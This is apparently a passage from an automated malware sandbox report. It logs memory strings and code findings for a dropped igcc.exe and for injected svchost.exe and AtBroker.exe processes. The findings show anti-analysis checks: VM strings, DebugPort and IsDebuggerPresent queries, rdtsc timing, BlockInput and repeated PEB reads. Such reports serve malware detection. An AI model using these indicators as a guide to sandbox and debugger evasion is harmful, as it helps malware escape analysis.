                  Source: powershell.exe, 00000003.00000002.1374616824.00000000046C7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Add-NetEventVmNetworkAdapter
                  Source: powershell.exe, 00000003.00000002.1383852652.0000000007CAD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                  Source: powershell.exe, 00000003.00000002.1383852652.0000000007C49000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
                  Source: powershell.exe, 00000003.00000002.1383852652.0000000007C49000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW8
                  Source: powershell.exe, 00000003.00000002.1374616824.00000000046C7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Get-NetEventVmNetworkAdapter
                  Source: AtBroker.exe, 00000010.00000002.3664527850.00000000033DA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000011.00000002.1963866262.000002E155EEC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\AppData\Roaming\igcc.exe API call chain: ExitProcess graph end node graph_12-101027
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                  Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
                  Source: C:\Windows\SysWOW64\AtBroker.exe Process queried: DebugPort
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 13_2_03A5BBA0 rdtsc 13_2_03A5BBA0
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 13_2_00417B23 LdrLoadDll, 13_2_00417B23
                  Source: C:\Users\user\AppData\Roaming\igcc.exe Code function: 12_2_00083F09 BlockInput, 12_2_00083F09
                  Source: C:\Users\user\AppData\Roaming\igcc.exe Code function: 12_2_00013B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 12_2_00013B3A
                  Source: C:\Users\user\AppData\Roaming\igcc.exe Code function: 12_2_00045A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 12_2_00045A7C
                  Source: C:\Users\user\AppData\Roaming\igcc.exe Code function: 12_2_00014B37 LoadLibraryA,GetProcAddress, 12_2_00014B37
                  Source: C:\Users\user\AppData\Roaming\igcc.exe Code function: 12_2_01455460 mov eax, dword ptr fs:[00000030h] 12_2_01455460
                  Source: C:\Users\user\AppData\Roaming\igcc.exe Code function: 12_2_01455400 mov eax, dword ptr fs:[00000030h] 12_2_01455400
                  Source: C:\Users\user\AppData\Roaming\igcc.exe Code function: 12_2_01453E30 mov eax, dword ptr fs:[00000030h] 12_2_01453E30
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 13_2_03A533A5 mov eax, dword ptr fs:[00000030h] 13_2_03A533A5
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 13_2_03A633A0 mov eax, dword ptr fs:[00000030h] 13_2_03A633A0
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 13_2_03A2E388 mov eax, dword ptr fs:[00000030h] 13_2_03A2E388
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 13_2_03A5438F mov eax, dword ptr fs:[00000030h] 13_2_03A5438F
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 13_2_03B0539D mov eax, dword ptr fs:[00000030h] 13_2_03B0539D
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 13_2_03A8739A mov eax, dword ptr fs:[00000030h] 13_2_03A8739A
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 13_2_03A28397 mov eax, dword ptr fs:[00000030h] 13_2_03A28397
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 13_2_03AEF3E6 mov eax, dword ptr fs:[00000030h] 13_2_03AEF3E6
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 13_2_03B053FC mov eax, dword ptr fs:[00000030h] 13_2_03B053FC
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 13_2_03A403E9 mov eax, dword ptr fs:[00000030h] 13_2_03A403E9
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 13_2_03A4E3F0 mov eax, dword ptr fs:[00000030h] 13_2_03A4E3F0
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 13_2_03A663FF mov eax, dword ptr fs:[00000030h] 13_2_03A663FF
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 13_2_03AEC3CD mov eax, dword ptr fs:[00000030h] 13_2_03AEC3CD
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 13_2_03A3A3C0 mov eax, dword ptr fs:[00000030h] 13_2_03A3A3C0
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 13_2_03A383C0 mov eax, dword ptr fs:[00000030h] 13_2_03A383C0
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 13_2_03AEB3D0 mov ecx, dword ptr fs:[00000030h] 13_2_03AEB3D0
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 13_2_03AF132D mov eax, dword ptr fs:[00000030h] 13_2_03AF132D
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 13_2_03A5F32A mov eax, dword ptr fs:[00000030h] 13_2_03A5F32A
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 13_2_03A27330 mov eax, dword ptr fs:[00000030h] 13_2_03A27330
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 13_2_03AB930B mov eax, dword ptr fs:[00000030h] 13_2_03AB930B
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 13_2_03A6A30B mov eax, dword ptr fs:[00000030h] 13_2_03A6A30B
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 13_2_03A2C310 mov ecx, dword ptr fs:[00000030h] 13_2_03A2C310
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 13_2_03A50310 mov ecx, dword ptr fs:[00000030h] 13_2_03A50310
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 13_2_03AEF367 mov eax, dword ptr fs:[00000030h] 13_2_03AEF367
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 13_2_03AD437C mov eax, dword ptr fs:[00000030h] 13_2_03AD437C
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 13_2_03A37370 mov eax, dword ptr fs:[00000030h] 13_2_03A37370
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 13_2_03AB2349 mov eax, dword ptr fs:[00000030h] 13_2_03AB2349
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 13_2_03A2D34C mov eax, dword ptr fs:[00000030h] 13_2_03A2D34C
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 13_2_03B05341 mov eax, dword ptr fs:[00000030h] 13_2_03B05341
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 13_2_03A29353 mov eax, dword ptr fs:[00000030h] 13_2_03A29353
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 13_2_03AB035C mov eax, dword ptr fs:[00000030h] 13_2_03AB035C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AB035C mov eax, dword ptr fs:[00000030h]13_2_03AB035C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AB035C mov eax, dword ptr fs:[00000030h]13_2_03AB035C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AB035C mov ecx, dword ptr fs:[00000030h]13_2_03AB035C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AB035C mov eax, dword ptr fs:[00000030h]13_2_03AB035C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AB035C mov eax, dword ptr fs:[00000030h]13_2_03AB035C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AFA352 mov eax, dword ptr fs:[00000030h]13_2_03AFA352
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A402A0 mov eax, dword ptr fs:[00000030h]13_2_03A402A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A402A0 mov eax, dword ptr fs:[00000030h]13_2_03A402A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A452A0 mov eax, dword ptr fs:[00000030h]13_2_03A452A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A452A0 mov eax, dword ptr fs:[00000030h]13_2_03A452A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A452A0 mov eax, dword ptr fs:[00000030h]13_2_03A452A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A452A0 mov eax, dword ptr fs:[00000030h]13_2_03A452A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AF92A6 mov eax, dword ptr fs:[00000030h]13_2_03AF92A6
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AF92A6 mov eax, dword ptr fs:[00000030h]13_2_03AF92A6
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AF92A6 mov eax, dword ptr fs:[00000030h]13_2_03AF92A6
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AF92A6 mov eax, dword ptr fs:[00000030h]13_2_03AF92A6
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AC62A0 mov eax, dword ptr fs:[00000030h]13_2_03AC62A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AC62A0 mov ecx, dword ptr fs:[00000030h]13_2_03AC62A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AC62A0 mov eax, dword ptr fs:[00000030h]13_2_03AC62A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AC62A0 mov eax, dword ptr fs:[00000030h]13_2_03AC62A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AC62A0 mov eax, dword ptr fs:[00000030h]13_2_03AC62A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AC62A0 mov eax, dword ptr fs:[00000030h]13_2_03AC62A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AC72A0 mov eax, dword ptr fs:[00000030h]13_2_03AC72A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AC72A0 mov eax, dword ptr fs:[00000030h]13_2_03AC72A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AB92BC mov eax, dword ptr fs:[00000030h]13_2_03AB92BC
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AB92BC mov eax, dword ptr fs:[00000030h]13_2_03AB92BC
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AB92BC mov ecx, dword ptr fs:[00000030h]13_2_03AB92BC
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AB92BC mov ecx, dword ptr fs:[00000030h]13_2_03AB92BC
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A6E284 mov eax, dword ptr fs:[00000030h]13_2_03A6E284
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A6E284 mov eax, dword ptr fs:[00000030h]13_2_03A6E284
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AB0283 mov eax, dword ptr fs:[00000030h]13_2_03AB0283
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AB0283 mov eax, dword ptr fs:[00000030h]13_2_03AB0283
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AB0283 mov eax, dword ptr fs:[00000030h]13_2_03AB0283
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03B05283 mov eax, dword ptr fs:[00000030h]13_2_03B05283
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A6329E mov eax, dword ptr fs:[00000030h]13_2_03A6329E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A6329E mov eax, dword ptr fs:[00000030h]13_2_03A6329E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AE12ED mov eax, dword ptr fs:[00000030h]13_2_03AE12ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AE12ED mov eax, dword ptr fs:[00000030h]13_2_03AE12ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AE12ED mov eax, dword ptr fs:[00000030h]13_2_03AE12ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AE12ED mov eax, dword ptr fs:[00000030h]13_2_03AE12ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AE12ED mov eax, dword ptr fs:[00000030h]13_2_03AE12ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AE12ED mov eax, dword ptr fs:[00000030h]13_2_03AE12ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AE12ED mov eax, dword ptr fs:[00000030h]13_2_03AE12ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AE12ED mov eax, dword ptr fs:[00000030h]13_2_03AE12ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AE12ED mov eax, dword ptr fs:[00000030h]13_2_03AE12ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AE12ED mov eax, dword ptr fs:[00000030h]13_2_03AE12ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AE12ED mov eax, dword ptr fs:[00000030h]13_2_03AE12ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AE12ED mov eax, dword ptr fs:[00000030h]13_2_03AE12ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AE12ED mov eax, dword ptr fs:[00000030h]13_2_03AE12ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AE12ED mov eax, dword ptr fs:[00000030h]13_2_03AE12ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A402E1 mov eax, dword ptr fs:[00000030h]13_2_03A402E1
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A402E1 mov eax, dword ptr fs:[00000030h]13_2_03A402E1
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A402E1 mov eax, dword ptr fs:[00000030h]13_2_03A402E1
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03B052E2 mov eax, dword ptr fs:[00000030h]13_2_03B052E2
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AEF2F8 mov eax, dword ptr fs:[00000030h]13_2_03AEF2F8
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A292FF mov eax, dword ptr fs:[00000030h]13_2_03A292FF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]13_2_03A3A2C3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]13_2_03A3A2C3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]13_2_03A3A2C3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]13_2_03A3A2C3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]13_2_03A3A2C3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A5B2C0 mov eax, dword ptr fs:[00000030h]13_2_03A5B2C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A5B2C0 mov eax, dword ptr fs:[00000030h]13_2_03A5B2C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A5B2C0 mov eax, dword ptr fs:[00000030h]13_2_03A5B2C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A5B2C0 mov eax, dword ptr fs:[00000030h]13_2_03A5B2C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A5B2C0 mov eax, dword ptr fs:[00000030h]13_2_03A5B2C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A5B2C0 mov eax, dword ptr fs:[00000030h]13_2_03A5B2C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A5B2C0 mov eax, dword ptr fs:[00000030h]13_2_03A5B2C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A392C5 mov eax, dword ptr fs:[00000030h]13_2_03A392C5
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A392C5 mov eax, dword ptr fs:[00000030h]13_2_03A392C5
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2B2D3 mov eax, dword ptr fs:[00000030h]13_2_03A2B2D3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2B2D3 mov eax, dword ptr fs:[00000030h]13_2_03A2B2D3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2B2D3 mov eax, dword ptr fs:[00000030h]13_2_03A2B2D3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A5F2D0 mov eax, dword ptr fs:[00000030h]13_2_03A5F2D0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A5F2D0 mov eax, dword ptr fs:[00000030h]13_2_03A5F2D0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03B05227 mov eax, dword ptr fs:[00000030h]13_2_03B05227
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2823B mov eax, dword ptr fs:[00000030h]13_2_03A2823B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A67208 mov eax, dword ptr fs:[00000030h]13_2_03A67208
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A67208 mov eax, dword ptr fs:[00000030h]13_2_03A67208
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A34260 mov eax, dword ptr fs:[00000030h]13_2_03A34260
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A34260 mov eax, dword ptr fs:[00000030h]13_2_03A34260
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A34260 mov eax, dword ptr fs:[00000030h]13_2_03A34260
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AFD26B mov eax, dword ptr fs:[00000030h]13_2_03AFD26B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AFD26B mov eax, dword ptr fs:[00000030h]13_2_03AFD26B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2826B mov eax, dword ptr fs:[00000030h]13_2_03A2826B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A59274 mov eax, dword ptr fs:[00000030h]13_2_03A59274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A71270 mov eax, dword ptr fs:[00000030h]13_2_03A71270
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A71270 mov eax, dword ptr fs:[00000030h]13_2_03A71270
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AE0274 mov eax, dword ptr fs:[00000030h]13_2_03AE0274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AE0274 mov eax, dword ptr fs:[00000030h]13_2_03AE0274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AE0274 mov eax, dword ptr fs:[00000030h]13_2_03AE0274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AE0274 mov eax, dword ptr fs:[00000030h]13_2_03AE0274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AE0274 mov eax, dword ptr fs:[00000030h]13_2_03AE0274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AE0274 mov eax, dword ptr fs:[00000030h]13_2_03AE0274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AE0274 mov eax, dword ptr fs:[00000030h]13_2_03AE0274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AE0274 mov eax, dword ptr fs:[00000030h]13_2_03AE0274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AE0274 mov eax, dword ptr fs:[00000030h]13_2_03AE0274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AE0274 mov eax, dword ptr fs:[00000030h]13_2_03AE0274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AE0274 mov eax, dword ptr fs:[00000030h]13_2_03AE0274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AE0274 mov eax, dword ptr fs:[00000030h]13_2_03AE0274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A29240 mov eax, dword ptr fs:[00000030h]13_2_03A29240
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A29240 mov eax, dword ptr fs:[00000030h]13_2_03A29240
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A6724D mov eax, dword ptr fs:[00000030h]13_2_03A6724D
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2A250 mov eax, dword ptr fs:[00000030h]13_2_03A2A250
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AEB256 mov eax, dword ptr fs:[00000030h]13_2_03AEB256
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AEB256 mov eax, dword ptr fs:[00000030h]13_2_03AEB256
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A36259 mov eax, dword ptr fs:[00000030h]13_2_03A36259
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AE11A4 mov eax, dword ptr fs:[00000030h]13_2_03AE11A4
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AE11A4 mov eax, dword ptr fs:[00000030h]13_2_03AE11A4
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AE11A4 mov eax, dword ptr fs:[00000030h]13_2_03AE11A4
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AE11A4 mov eax, dword ptr fs:[00000030h]13_2_03AE11A4
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A4B1B0 mov eax, dword ptr fs:[00000030h]13_2_03A4B1B0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A70185 mov eax, dword ptr fs:[00000030h]13_2_03A70185
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AEC188 mov eax, dword ptr fs:[00000030h]13_2_03AEC188
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AEC188 mov eax, dword ptr fs:[00000030h]13_2_03AEC188
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AB019F mov eax, dword ptr fs:[00000030h]13_2_03AB019F
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AB019F mov eax, dword ptr fs:[00000030h]13_2_03AB019F
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AB019F mov eax, dword ptr fs:[00000030h]13_2_03AB019F
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AB019F mov eax, dword ptr fs:[00000030h]13_2_03AB019F
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2A197 mov eax, dword ptr fs:[00000030h]13_2_03A2A197
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2A197 mov eax, dword ptr fs:[00000030h]13_2_03A2A197
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2A197 mov eax, dword ptr fs:[00000030h]13_2_03A2A197
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A551EF mov eax, dword ptr fs:[00000030h]13_2_03A551EF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A551EF mov eax, dword ptr fs:[00000030h]13_2_03A551EF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A551EF mov eax, dword ptr fs:[00000030h]13_2_03A551EF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A551EF mov eax, dword ptr fs:[00000030h]13_2_03A551EF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A551EF mov eax, dword ptr fs:[00000030h]13_2_03A551EF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A551EF mov eax, dword ptr fs:[00000030h]13_2_03A551EF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A551EF mov eax, dword ptr fs:[00000030h]13_2_03A551EF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A551EF mov eax, dword ptr fs:[00000030h]13_2_03A551EF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A551EF mov eax, dword ptr fs:[00000030h]13_2_03A551EF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A551EF mov eax, dword ptr fs:[00000030h]13_2_03A551EF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A551EF mov eax, dword ptr fs:[00000030h]13_2_03A551EF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A551EF mov eax, dword ptr fs:[00000030h]13_2_03A551EF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A551EF mov eax, dword ptr fs:[00000030h]13_2_03A551EF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A351ED mov eax, dword ptr fs:[00000030h]13_2_03A351ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03B061E5 mov eax, dword ptr fs:[00000030h]13_2_03B061E5
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A601F8 mov eax, dword ptr fs:[00000030h]13_2_03A601F8
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AF61C3 mov eax, dword ptr fs:[00000030h]13_2_03AF61C3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AF61C3 mov eax, dword ptr fs:[00000030h]13_2_03AF61C3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A6D1D0 mov eax, dword ptr fs:[00000030h]13_2_03A6D1D0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A6D1D0 mov ecx, dword ptr fs:[00000030h]13_2_03A6D1D0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03B051CB mov eax, dword ptr fs:[00000030h]13_2_03B051CB
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A60124 mov eax, dword ptr fs:[00000030h]13_2_03A60124
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A31131 mov eax, dword ptr fs:[00000030h]13_2_03A31131
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A31131 mov eax, dword ptr fs:[00000030h]13_2_03A31131
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2B136 mov eax, dword ptr fs:[00000030h]13_2_03A2B136
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2B136 mov eax, dword ptr fs:[00000030h]13_2_03A2B136
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2B136 mov eax, dword ptr fs:[00000030h]13_2_03A2B136
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2B136 mov eax, dword ptr fs:[00000030h]13_2_03A2B136
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03ADA118 mov ecx, dword ptr fs:[00000030h]13_2_03ADA118
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03ADA118 mov eax, dword ptr fs:[00000030h]13_2_03ADA118
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03ADA118 mov eax, dword ptr fs:[00000030h]13_2_03ADA118
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03ADA118 mov eax, dword ptr fs:[00000030h]13_2_03ADA118
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AF0115 mov eax, dword ptr fs:[00000030h]13_2_03AF0115
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2F172 mov eax, dword ptr fs:[00000030h]13_2_03A2F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2F172 mov eax, dword ptr fs:[00000030h]13_2_03A2F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2F172 mov eax, dword ptr fs:[00000030h]13_2_03A2F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2F172 mov eax, dword ptr fs:[00000030h]13_2_03A2F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2F172 mov eax, dword ptr fs:[00000030h]13_2_03A2F172
